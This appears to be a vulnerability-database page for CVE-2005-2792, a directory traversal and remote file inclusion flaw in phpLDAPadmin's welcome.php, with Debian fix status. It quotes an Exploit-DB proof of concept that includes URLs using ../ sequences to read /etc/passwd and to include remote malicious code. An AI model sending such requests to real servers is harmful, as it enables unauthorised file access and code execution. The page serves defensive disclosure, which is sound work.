CVE-2005-2792

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Directory traversal vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the custom_welcome_page parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-26211 webapps php verified text · 1 KB

rgod · 2005-08-30

phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/14695/info

phpldapadmin is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

phpldapadmin is prone to a directory traversal vulnerability. An attacker can exploit this vulnerability to retrieve arbitrary files on the vulnerable system in the security context of the Web server process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.

phpldapadmin is prone to a remote file include vulnerability. An attacker can exploit this vulnerability to execute arbitrary PHP script code in the security context of the Web server process.

phpldapadmin is also prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=http://www.example.com/[malicious code]

OS impact

Debian Fixed 4 releases

Version	Status	Fixed in
trixie	Fixed	`0.9.6c-7`
sid	Fixed	`0.9.6c-7`
forky	Fixed	`0.9.6c-7`
bookworm	Fixed	`0.9.6c-7`

References

https://security-tracker.debian.org/tracker/CVE-2005-2792

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.